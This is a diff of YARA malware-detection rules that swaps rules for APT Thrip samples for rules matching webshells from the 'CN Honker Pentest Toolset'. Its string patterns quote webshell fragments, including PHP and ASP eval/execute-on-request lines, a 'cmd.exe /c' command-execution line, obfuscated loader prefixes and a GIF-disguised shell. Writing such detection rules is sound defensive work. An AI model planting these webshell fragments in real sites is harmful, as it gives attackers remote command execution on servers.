+		$s1 = "<title>Changing CHMOD Permissions Exploit " fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 60KB and all of them
+		uint16( 0 ) == 0x696c and filesize < 6KB and all of them
 }
-rule SIGNATURE_BASE_APT_Thrip_Sample_Jun18_4 : FILE
+rule SIGNATURE_BASE_CN_Honker_Webshell_Interception3389_Get : FILE
 {
 	meta:
-		description = "Detects sample found in Thrip report by Symantec "
+		description = "Webshell from CN Honker Pentest Toolset - file get.asp"
 		author = "Florian Roth (Nextron Systems)"
-		id = "9dcfcdbd-d18f-5eba-a10c-95686f010f23"
-		date = "2018-06-21"
+		id = "b17a793f-ffb7-5cdc-ba21-b0e2f0d14490"
+		date = "2015-06-23"
 		modified = "2023-12-05"
-		reference = "https://www.symantec.com/blogs/threat-intelligence/thrip-hits-satellite-telecoms-defense-targets "
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_thrip.yar#L64-L85"
+		reference = "Disclosed CN Honker Pentest Toolset"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/cn_pentestset_webshells.yar#L110-L126"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "f258070054a29cbec0876536d295b85c7bd9f23988d1e0fc2ba58660b0796716"
-		score = 75
+		hash = "ceb6306f6379c2c1634b5058e1894b43abcf0296"
+		logic_hash = "649e611c9d8948e60811af4209d737b3e797e6b42beba42439541ae543b062d6"
+		score = 70
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "6b236d3fc54d36e6dc2a26299f6ded597058fed7c9099f1a37716c5e4b162abc"
 
 	strings:
-		$s1 = "\\system32\\wbem\\tmf\\caches_version.db" ascii
-		$s2 = "ProcessName No Access" fullword ascii
-		$s3 = "Hwnd of Process NULL" fullword ascii
-		$s4 = "*********The new session is be opening:(%d)**********" fullword ascii
-		$s5 = "[EXECUTE]" fullword ascii
-		$s6 = "/------------------------------------------------------------------------" fullword ascii
-		$s7 = "constructor or from DllMain." fullword ascii
-		$s8 = "Time:%d-%d-%d %d:%d:%d" fullword ascii
-		$s9 = "\\info.config" ascii
+		$s0 = "userip = Request.ServerVariables(\"HTTP_X_FORWARDED_FOR\")" fullword ascii
+		$s1 = "file.writeline  szTime + \" HostName:\" + szhostname + \" IP:\" + userip+\":\"+n" ascii
+		$s3 = "set file=fs.OpenTextFile(server.MapPath(\"WinlogonHack.txt\"),8,True)" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 400KB and 5 of them
+		filesize < 3KB and all of them
 }
-rule SIGNATURE_BASE_APT_Thrip_Sample_Jun18_5 : FILE
+rule SIGNATURE_BASE_CN_Honker_Webshell_Nc_1 : FILE
 {
 	meta:
-		description = "Detects sample found in Thrip report by Symantec "
+		description = "Webshell from CN Honker Pentest Toolset - file 1.txt"
 		author = "Florian Roth (Nextron Systems)"
-		id = "42c56ed6-a509-568f-a611-ce7e5c5d9d8e"
-		date = "2018-06-21"
+		id = "fe83df79-f7cb-50b8-bb34-9bfc5fbe3de2"
+		date = "2015-06-23"
 		modified = "2023-12-05"
-		reference = "https://www.symantec.com/blogs/threat-intelligence/thrip-hits-satellite-telecoms-defense-targets "
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_thrip.yar#L87-L101"
+		reference = "Disclosed CN Honker Pentest Toolset"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/cn_pentestset_webshells.yar#L128-L143"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "6f2d4cfd55017ebb34fb6e8ad1b0b46b184926c69d4bacee88dc639771f96792"
-		score = 75
+		hash = "51d83961171db000fe4476f36d703ef3de409676"
+		logic_hash = "80ea8f16d943a3775fe9999131272af9e7f1af60d413109e58ecdef036484760"
+		score = 70
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "32889639a27961497d53176765b3addf9fff27f1c8cc41634a365085d6d55920"
 
 	strings:
-		$s2 = "c:\\windows\\USBEvent.exe" fullword ascii
-		$s5 = "c:\\windows\\spdir.dat" fullword ascii
+		$s1 = "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Mozilla/4.0 " ascii
+		$s2 = "<%if session(\"pw\")<>\"go\" then %>" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 200KB and all of them
+		filesize < 11KB and all of them
 }
-rule SIGNATURE_BASE_APT_Thrip_Sample_Jun18_6 : FILE
+rule SIGNATURE_BASE_CN_Honker_Webshell_PHP_Blacksky : FILE
 {
 	meta:
-		description = "Detects sample found in Thrip report by Symantec "
+		description = "Webshell from CN Honker Pentest Toolset - file php6.txt"
 		author = "Florian Roth (Nextron Systems)"
-		id = "a1c65bc1-371e-509f-a01c-2d58c1773f95"
-		date = "2018-06-21"
+		id = "741bb4db-6296-5222-8480-1169a6f44fd8"
+		date = "2015-06-23"
 		modified = "2023-12-05"
-		reference = "https://www.symantec.com/blogs/threat-intelligence/thrip-hits-satellite-telecoms-defense-targets "
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_thrip.yar#L103-L116"
+		reference = "Disclosed CN Honker Pentest Toolset"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/cn_pentestset_webshells.yar#L145-L160"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "f6cc84ebed26a0dbecfcb3ffb3a11c111ae3d5b40497d59ada518d33bee57fdd"
-		score = 75
+		hash = "a60a599c6c8b6a6c0d9da93201d116af257636d7"
+		logic_hash = "3b92f63f536361d8ba0cde853fb546f271abdec3a7c1d44688a42610f5f90c57"
+		score = 70
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "44f58496578e55623713c4290abb256d03103e78e99939daeec059776bd79ee2"
 
 	strings:
-		$s1 = "C:\\Windows\\system32\\Instell.exe" fullword ascii
+		$s0 = "eval(gzinflate(base64_decode('" ascii
+		$s1 = "B1ac7Sky-->" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 100KB and 1 of them
+		filesize < 641KB and all of them
 }
-rule SIGNATURE_BASE_APT_Thrip_Sample_Jun18_7 : FILE
+rule SIGNATURE_BASE_CN_Honker_Webshell_ASP_Asp3 : FILE
 {
 	meta:
-		description = "Detects sample found in Thrip report by Symantec "
+		description = "Webshell from CN Honker Pentest Toolset - file asp3.txt"
 		author = "Florian Roth (Nextron Systems)"
-		id = "16739590-eb88-5de2-bd76-974b3343ec19"
-		date = "2018-06-21"
+		id = "0cb01c07-b424-532d-8aef-5ec25dfe3f19"
+		date = "2015-06-23"
 		modified = "2023-12-05"
-		reference = "https://www.symantec.com/blogs/threat-intelligence/thrip-hits-satellite-telecoms-defense-targets "
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_thrip.yar#L118-L131"
+		reference = "Disclosed CN Honker Pentest Toolset"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/cn_pentestset_webshells.yar#L162-L177"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "198f8869e56d5549d9195524a86f6557162c5d25b4915bec0bf513797d880ea1"
-		score = 75
+		hash = "87c5a76989bf08da5562e0b75c196dcb3087a27b"
+		logic_hash = "e5f30a445be30c491e669c633bf2df08cbfb1017ecfc91f9ed83275550488304"
+		score = 70
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "6b714dc1c7e58589374200d2c7f3d820798473faeb26855e53101b8f3c701e3f"
 
 	strings:
-		$s1 = "C:\\runme.exe" ascii
+		$s1 = "if shellpath=\"\" then shellpath = \"cmd.exe\"" fullword ascii
+		$s2 = "c.open \"GET\", \"http://127.0.0.1:\" & port & \"/M_Schumacher/upadmin/s3\", Tru" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 60KB and 1 of them
+		filesize < 444KB and all of them
 }
-rule SIGNATURE_BASE_APT_Thrip_Sample_Jun18_8 : FILE
+rule SIGNATURE_BASE_CN_Honker_Webshell_ASPX_Sniff : FILE
 {
 	meta:
-		description = "Detects sample found in Thrip report by Symantec "
+		description = "Webshell from CN Honker Pentest Toolset - file sniff.txt"
 		author = "Florian Roth (Nextron Systems)"
-		id = "5eb98c9e-5103-5146-9364-d5f24416406f"
-		date = "2018-06-21"
+		id = "8cf47d71-1b97-5967-ad70-2ea6fad7cc29"
+		date = "2015-06-23"
 		modified = "2023-12-05"
-		reference = "https://www.symantec.com/blogs/threat-intelligence/thrip-hits-satellite-telecoms-defense-targets "
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_thrip.yar#L133-L148"
+		reference = "Disclosed CN Honker Pentest Toolset"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/cn_pentestset_webshells.yar#L179-L194"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "6c8ddc7fb5f3256e57e66f502f6e3c582d82540f773bf4113cac4a685d45f81b"
-		score = 75
+		hash = "e246256696be90189e6d50a4ebc880e6d9e28dfd"
+		logic_hash = "198442e75422055e7d65c5d1aef55819036a99077aa79dbd5006ba97c4fe4af8"
+		score = 70
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "0f2d09b1ad0694f9e71eeebec5b2d137665375bf1e76cb4ae4d7f20487394ed3"
 
 	strings:
-		$x1 = "$.oS.Run('cmd.exe /c '+a+'" fullword ascii
-		$x2 = "new $._x('WScript.Shell');" ascii
-		$x3 = ".ExpandEnvironmentStrings('%Temp%')+unescape('" ascii
+		$s1 = "IPHostEntry HosyEntry = Dns.GetHostEntry((Dns.GetHostName()));" fullword ascii
+		$s2 = "if (!logIt && my_s_smtp && (dport == 25 || sport == 25))" fullword ascii
 
 	condition:
-		filesize < 10KB and 1 of ( $x* )
+		filesize < 91KB and all of them
 }
-
-rule SIGNATURE_BASE_APT_Thrip_Sample_Jun18_9 : FILE
+rule SIGNATURE_BASE_CN_Honker_Webshell_Udf_Udf : FILE
 {
 	meta:
-		description = "Detects sample found in Thrip report by Symantec "
+		description = "Webshell from CN Honker Pentest Toolset - file udf.php"
 		author = "Florian Roth (Nextron Systems)"
-		id = "7fcd8d7f-ed60-5155-a0dd-f3a36f3f2981"
-		date = "2018-06-21"
+		id = "07252f2d-1a99-5f21-940d-899a4821b511"
+		date = "2015-06-23"
 		modified = "2023-12-05"
-		reference = "https://www.symantec.com/blogs/threat-intelligence/thrip-hits-satellite-telecoms-defense-targets "
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_thrip.yar#L150-L170"
+		reference = "Disclosed CN Honker Pentest Toolset"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/cn_pentestset_webshells.yar#L196-L211"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "0500481ae4bb7d4a223a106d2887b994e5000815704e678b2f3ff127a86c22a2"
-		score = 75
+		hash = "df63372ccab190f2f1d852f709f6b97a8d9d22b9"
+		logic_hash = "c7db32b5e66601e0b8322ac67b6b9ba8d6222891ed01db557bfac9985140421a"
+		score = 70
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "8e6682bcc51643f02a864b042f7223b157823f3d890fe21d38caeb43500d923e"
-		hash2 = "0c8ca0fd0ec246ef207b96a3aac5e94c9c368504905b0a033f11eef8c62fa14c"
-		hash3 = "6d0a2c822e2bc37cc0cec35f040d3fec5090ef2775df658d3823e47a93a5fef3"
-		hash4 = "0c49d1632eb407b5fd0ce32ed45b1c783ac2ef60d001853ae1f6b7574e08cfa9"
+
+	strings:
+		$s1 = "<?php // Source  My : Meiam  " fullword ascii
+		$s2 = "$OOO0O0O00=__FILE__;$OOO000000=urldecode('" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 100KB and ( pe.imphash ( ) == "a7f0714e82b3105031fa7bc89dfe7664" or pe.imphash ( ) == "8812ff21aeb160e8800257140acae54b" or pe.imphash ( ) == "44a1e904763fe2d0837c747c7061b010" or pe.imphash ( ) == "51a854d285aa12eb82e76e6e1be01573" or pe.imphash ( ) == "a1f457c8c549c5c430556bfe5887a4e6" )
+		filesize < 430KB and all of them
 }
-rule SIGNATURE_BASE_APT_Thrip_Sample_Jun18_10 : FILE
+rule SIGNATURE_BASE_CN_Honker_Webshell_JSP_Jsp : FILE
 {
 	meta:
-		description = "Detects sample found in Thrip report by Symantec "
+		description = "Webshell from CN Honker Pentest Toolset - file jsp.html"
 		author = "Florian Roth (Nextron Systems)"
-		id = "3307ca18-59fb-5400-b51e-c4f4aa99e592"
-		date = "2018-06-21"
+		id = "46f2fb10-2c0c-5bc2-b3bb-eba4c74bcad7"
+		date = "2015-06-23"
 		modified = "2023-12-05"
-		reference = "https://www.symantec.com/blogs/threat-intelligence/thrip-hits-satellite-telecoms-defense-targets "
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_thrip.yar#L172-L189"
+		reference = "Disclosed CN Honker Pentest Toolset"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/cn_pentestset_webshells.yar#L213-L228"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "79a8dfd63e96ccc9259272476e364e53b841b42255a2a5f3b9f93e91caa5d1c2"
-		score = 75
+		hash = "c58fed3d3d1e82e5591509b04ed09cb3675dc33a"
+		logic_hash = "089e1a553900d149a4087ac81254295d74de15d9baaf73e60ce4f061e450e8c7"
+		score = 70
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "350d2a6f8e6a4969ffbf75d9f9aae99e7b3a8cd8708fd66f977e07d7fbf842e3"
 
 	strings:
-		$x1 = "!This Program cannot be run in DOS mode." fullword ascii
-		$x2 = "!this program cannot be run in dos mode." fullword ascii
-		$s1 = "svchost.dll" fullword ascii
-		$s2 = "constructor or from DllMain." fullword ascii
+		$s1 = "<input name=f size=30 value=shell.jsp>" fullword ascii
+		$s2 = "<font color=red>www.i0day.com  By:" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 200KB and ( $x1 or 2 of them )
+		filesize < 3KB and all of them
 }
-
-rule SIGNATURE_BASE_APT_Thrip_Sample_Jun18_11 : FILE
+rule SIGNATURE_BASE_CN_Honker_Webshell_T00Ls_Lpk_Sethc_V4_Mail : FILE
 {
 	meta:
-		description = "Detects sample found in Thrip report by Symantec "
+		description = "Webshell from CN Honker Pentest Toolset - file mail.php"
 		author = "Florian Roth (Nextron Systems)"
-		id = "69476f7d-c436-5863-bf20-1d3e821974e6"
-		date = "2018-06-21"
+		id = "2f7d8a4d-9d94-5f23-9768-cc3712678d93"
+		date = "2015-06-23"
 		modified = "2023-12-05"
-		reference = "https://www.symantec.com/blogs/threat-intelligence/thrip-hits-satellite-telecoms-defense-targets "
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_thrip.yar#L191-L210"
+		reference = "Disclosed CN Honker Pentest Toolset"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/cn_pentestset_webshells.yar#L230-L245"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "066fc3622a0db5cc511e85f6efc08191c2c9268524c8761dc17a05e6d133c263"
-		score = 75
+		hash = "0a9b7b438591ee78ee573028cbb805a9dbb9da96"
+		logic_hash = "b835a6d0c736116e0a8b277dadbf25c2ac333b0d7937a6f67ed59887c610a57a"
+		score = 70
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "590a6796b97469f8e6977832a63c0964464901f075a9651f7f1b4578e55bd8c8"
 
 	strings:
-		$s1 = "\\AppData\\Local\\Temp\\dw20.EXE" ascii
-		$s2 = "C:\\Windows\\system32\\sysprep\\cryptbase.dll" fullword ascii
-		$s3 = "WFQNJMBWF" fullword ascii
-		$s4 = "SQLWLWZSF" fullword ascii
-		$s5 = "PFQUFQSBPP" fullword ascii
-		$s6 = "WQZXQFPVOW" fullword ascii
+		$s1 = "if (!$this->smtp_putcmd(\"AUTH LOGIN\", base64_encode($this->user)))" fullword ascii
+		$s2 = "$this->smtp_debug(\"> \".$cmd.\"\\n\");" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 100KB and ( pe.imphash ( ) == "6eef4394490378f32d134ab3bf4bf194" or all of them )
+		filesize < 39KB and all of them
 }
-rule SIGNATURE_BASE_APT_Thrip_Sample_Jun18_12 : FILE
+rule SIGNATURE_BASE_CN_Honker_Webshell_Phpwebbackup : FILE
 {
 	meta:
-		description = "Detects sample found in Thrip report by Symantec "
+		description = "Webshell from CN Honker Pentest Toolset - file phpwebbackup.php"
 		author = "Florian Roth (Nextron Systems)"
-		id = "b24b8042-b6a3-5af8-9fcf-6d042bdb9524"
-		date = "2018-06-21"
+		id = "eb737ea6-231c-5e8d-b976-75f1044f9f54"
+		date = "2015-06-23"
 		modified = "2023-12-05"
-		reference = "https://www.symantec.com/blogs/threat-intelligence/thrip-hits-satellite-telecoms-defense-targets "
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_thrip.yar#L212-L234"
+		reference = "Disclosed CN Honker Pentest Toolset"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/cn_pentestset_webshells.yar#L247-L262"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "49357a34f3b1d0bb86d1c6ddfa6a6c3b92bfafaebd050d835c0a902199a2121b"
-		score = 75
+		hash = "c788cb280b7ad0429313837082fe84e9a49efab6"
+		logic_hash = "45452fc415fbafe170a1b1f5a58df40f0ec65a9a6678e675b40a8c54e2d8bd6c"
+		score = 70
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "33c01d3266fe6a70e8785efaf10208f869ae58a17fd9cdb2c6995324c9a01062"
 
 	strings:
-		$s1 = "pGlobal->nOSType==64--%s\\cmd.exe %s" fullword ascii
-		$s2 = "httpcom.log" fullword ascii
-		$s3 = "\\CryptBase.dll" ascii
-		$s4 = "gupdate.exe" fullword ascii
-		$s5 = "wusa.exe" fullword ascii
-		$s6 = " %s %s /quiet /extract:%s\\%s\\" ascii
-		$s7 = "%s%s.dll.cab" fullword ascii
-		$s8 = "/c %s\\%s\\%s%s %s" fullword ascii
-		$s9 = "ReleaseEvildll" fullword ascii
-		$s0 = "%s\\%s\\%s%s" fullword ascii
+		$s0 = "<?php // Code By isosky www.nbst.org" fullword ascii
+		$s2 = "$OOO0O0O00=__FILE__;$OOO000000=urldecode('" ascii
+
+	condition:
+		uint16( 0 ) == 0x3f3c and filesize < 67KB and all of them
+}
+rule SIGNATURE_BASE_CN_Honker_Webshell_Dz_Phpcms_Phpbb : FILE
+{
+	meta:
+		description = "Webshell from CN Honker Pentest Toolset - file dz_phpcms_phpbb.txt"
+		author = "Florian Roth (Nextron Systems)"
+		id = "f7e5413f-a7c9-51d4-8422-30c3e2462be2"
+		date = "2015-06-23"
+		modified = "2023-12-05"
+		reference = "Disclosed CN Honker Pentest Toolset"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/cn_pentestset_webshells.yar#L264-L281"
+		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
+		hash = "33f23c41df452f8ca2768545ac6e740f30c44d1f"
+		logic_hash = "1455df58f51c3ae7558b89c940d97ea5870f261217b2a09727bb6678bcbd5500"
+		score = 70
+		quality = 85
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+
+	strings:
+		$s1 = "if($pwd == md5(md5($password).$salt))" fullword ascii
+		$s2 = "function test_1($password)" fullword ascii
+		$s3 = ":\".$pwd.\"\\n---------------------------------\\n\";exit;" fullword ascii
+		$s4 = ":user=\".$user.\"\\n\";echo \"pwd=\".$pwd.\"\\n\";echo \"salt=\".$salt.\"\\n\";" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 100KB and 6 of them
+		filesize < 22KB and all of them
 }
-
-rule SIGNATURE_BASE_APT_Thrip_Sample_Jun18_13 : FILE
+rule SIGNATURE_BASE_CN_Honker_Webshell_Picloaked_1 : FILE
 {
 	meta:
-		description = "Detects sample found in Thrip report by Symantec "
+		description = "Webshell from CN Honker Pentest Toolset - file 1.gif"
 		author = "Florian Roth (Nextron Systems)"
-		id = "e6aec6f3-2024-5fb2-b37a-77a182684d32"
-		date = "2018-06-21"
+		id = "2ff44c4a-ed97-5635-9926-8d54a8364fab"
+		date = "2015-06-23"
 		modified = "2023-12-05"
-		reference = "https://www.symantec.com/blogs/threat-intelligence/thrip-hits-satellite-telecoms-defense-targets "
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_thrip.yar#L236-L254"
+		reference = "Disclosed CN Honker Pentest Toolset"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/cn_pentestset_webshells.yar#L283-L299"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "3c319a3ca78687cd2af77d97b4b4a8e72dadd812bf3da2145a23df278c3aa9a2"
-		score = 75
+		hash = "3eab1798cbc9ab3b2c67d3da7b418d07e775db70"
+		logic_hash = "a816ac9e98b7c5208f075ffcb9a6525016d6a5c468005d78ecab90d651423705"
+		score = 70
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "780620521c92aab3d592b3dc149cbf58751ea285cfdaa50510002b441796b312"
 
 	strings:
-		$s1 = "User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like Gecko" fullword ascii
-		$s2 = "<member><name>password</name>" fullword ascii
-		$s3 = "<value><string>qqtorspy</string></value>" fullword ascii
-		$s4 = "SOFTWARE\\QKitTORSPY" fullword wide
-		$s5 = "ipecho.net" fullword ascii
+		$s0 = "<?php eval($_POST[" ascii
+		$s1 = ";<%execute(request(" ascii
+		$s3 = "GIF89a" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 500KB and ( pe.imphash ( ) == "3dfad33b2fb66c083c99dc10341908b7" or 4 of them )
+		filesize < 6KB and 2 of them
 }
-
-rule SIGNATURE_BASE_APT_Thrip_Sample_Jun18_14 : FILE
+rule SIGNATURE_BASE_CN_Honker_Webshell_Assembly : FILE
 {
 	meta:
-		description = "Detects sample found in Thrip report by Symantec "
+		description = "Webshell from CN Honker Pentest Toolset - file assembly.asp"
 		author = "Florian Roth (Nextron Systems)"
-		id = "736e2700-cdcb-5165-b786-67edaef765b6"
-		date = "2018-06-21"
+		id = "7639e81d-fe21-5a12-9a20-fe894eefef73"
+		date = "2015-06-23"
 		modified = "2023-12-05"
-		reference = "https://www.symantec.com/blogs/threat-intelligence/thrip-hits-satellite-telecoms-defense-targets "
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_thrip.yar#L256-L276"
+		reference = "Disclosed CN Honker Pentest Toolset"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/cn_pentestset_webshells.yar#L301-L315"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "c96a40495bc2a17a6215c877ad054bd2e1e10c524c2d54da1955d370b9ccdcd7"
-		score = 75
+		hash = "2bcb4d22758b20df6b9135d3fb3c8f35a9d9028e"
+		logic_hash = "34dc47b2f91a15a62175f3cab88d5ff24d2a3aa62f74fb9e43a4aaae96ced999"
+		score = 70
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "67dd44a8fbf6de94c4589cf08aa5757b785b26e49e29488e9748189e13d90fb3"
 
 	strings:
-		$s1 = "%SystemRoot%\\System32\\svchost.exe -k " fullword ascii
-		$s2 = "spdirs.dll" fullword ascii
-		$s3 = "Provides storm installation services such as Publish, and Remove." fullword ascii
-		$s4 = "RegSetValueEx(Svchost\\netsvcs)" fullword ascii
-		$s5 = "Load %s Error" fullword ascii
+		$s0 = "response.write oScriptlhn.exec(\"cmd.exe /c\" & request(\"c\")).stdout.readall" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 200KB and ( ( pe.exports ( "InstallA" ) and pe.exports ( "InstallB" ) and pe.exports ( "InstallC" ) ) or all of them )
+		filesize < 1KB and all of them
 }
-
-rule SIGNATURE_BASE_APT_Thrip_Sample_Jun18_15 : FILE
+rule SIGNATURE_BASE_CN_Honker_Webshell_PHP_Php8 : FILE
 {
 	meta:
-		description = "Detects sample found in Thrip report by Symantec "
+		description = "Webshell from CN Honker Pentest Toolset - file php8.txt"
 		author = "Florian Roth (Nextron Systems)"
-		id = "fd8aa404-4c12-5c8f-a952-a143da858b9b"
-		date = "2018-06-21"
+		id = "8b25b7f3-b94e-5887-b102-b52d340a4316"
+		date = "2015-06-23"
 		modified = "2023-12-05"
-		reference = "https://www.symantec.com/blogs/threat-intelligence/thrip-hits-satellite-telecoms-defense-targets "
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_thrip.yar#L278-L299"
+		reference = "Disclosed CN Honker Pentest Toolset"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/cn_pentestset_webshells.yar#L317-L334"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "22769d215e52965f48eb3455b39fbd8f8ce950a67f8132612d42b78fde9822a5"
-		score = 75
+		hash = "b7b49f1d6645865691eccd025e140c521ff01cce"
+		logic_hash = "435ceb72c082f702284c464979a907a59a42bb4aa07311f9b2da1a9831efac11"
+		score = 70
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "231c569f11460a12b171f131c40a6f25d8416954b35c28ae184aba8a649d9786"
 
 	strings:
-		$s1 = "%s\\cmd.exe /c %s" fullword ascii
-		$s2 = "CryptBase.dll" fullword ascii
-		$s3 = "gupdate.exe" fullword ascii
-		$s4 = "wusa.exe" fullword ascii
-		$s5 = " %s %s /quiet /extract:%s\\%s\\" ascii
-		$s6 = "%s%s.dll.cab" fullword ascii
-		$s7 = "%s\\%s\\%s%s %s" fullword ascii
-		$s8 = "%s\\%s\\%s%s" fullword ascii
+		$s0 = "<a href=\"http://hi.baidu.com/ca3tie1/home\" target=\"_blank\">Ca3tie1's Blog</a" ascii
+		$s1 = "function startfile($path = 'dodo.zip')" fullword ascii
+		$s3 = "<form name=\"myform\" method=\"post\" action=\"\">" fullword ascii
+		$s5 = "$_REQUEST[zipname] = \"dodozip.zip\"; " fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 200KB and ( pe.imphash ( ) == "f6ec70a295000ab0a753aa708e9439b4" or 6 of them )
+		filesize < 25KB and 2 of them
 }
-
-rule SIGNATURE_BASE_APT_Thrip_Sample_Jun18_16 : FILE
+rule SIGNATURE_BASE_CN_Honker_Webshell_Tuoku_Script_Xx : FILE
 {
 	meta:
-		description = "Detects sample found in Thrip report by Symantec "
+		description = "Webshell from CN Honker Pentest Toolset - file xx.php"
 		author = "Florian Roth (Nextron Systems)"
-		id = "58be9a1b-2228-5d7a-97c9-198cacbe1a66"
-		date = "2018-06-21"
